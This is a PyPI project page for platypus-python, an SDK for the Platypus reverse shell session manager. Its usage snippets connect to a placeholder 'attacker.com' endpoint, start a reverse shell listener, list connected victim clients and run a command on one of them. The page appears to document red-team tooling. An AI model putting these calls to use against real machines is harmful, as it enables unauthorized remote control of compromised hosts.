Python SDK for reverse shell sessions manager - Platypus v1.4.1
Project description
Platypus-Python
Python SDK for reverse shell sessions manager Platypus v1.3.1
Install
pip install platypus-python
Usage
Connect to Platypus endpoint
import platypus_python as pp
p = pp.Platypus("attacker.com", 7331)
Create a reverse shell server
server = p.create_server("0.0.0.0", 13339)
Stop a reverse shell server
server = servers[0]
server.delete()
Get all available listening servers
servers = p.get_servers()
for server in servers():
print(server)
Get all online Clients of a server
server = servers[0]
clients = server.get_clients()
for client in clients:
print(client)
Execute a command on a client
client = clients[0]
client.system("id")
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
platypus-python-1.0.3.tar.gz
(2.7 kB
view details)
Built Distribution
File details
Details for the file platypus-python-1.0.3.tar.gz
.
File metadata
- Download URL: platypus-python-1.0.3.tar.gz
- Upload date:
- Size: 2.7 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/3.10.0 pkginfo/1.7.0 requests/2.24.0 requests-toolbelt/0.9.1 tqdm/4.59.0 CPython/3.8.6
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 1ef77047e213e54f56a014f1a59217ce94b70310e42ed8a04f704530e8740da9 |
|
MD5 | 97b3c9f441497241f870229459434fa6 |
|
BLAKE2b-256 | d3e46ac66c575d7e0dfa03dc7f3afbe5de48c0889a685993627c436466232e79 |
File details
Details for the file platypus_python-1.0.3-py3-none-any.whl
.
File metadata
- Download URL: platypus_python-1.0.3-py3-none-any.whl
- Upload date:
- Size: 2.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/3.10.0 pkginfo/1.7.0 requests/2.24.0 requests-toolbelt/0.9.1 tqdm/4.59.0 CPython/3.8.6
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 8d87ef866cbac04db89c2e5f7379e9c121db64c4bc5d0504fa4b63a6de8356e5 |
|
MD5 | 517aa5fd3f2c8d5edc5a2f23be86da39 |
|
BLAKE2b-256 | 44b1c85905af6296b9a49d1a68b30bd1c2c25390758f5fc3e401c4a51dc8923a |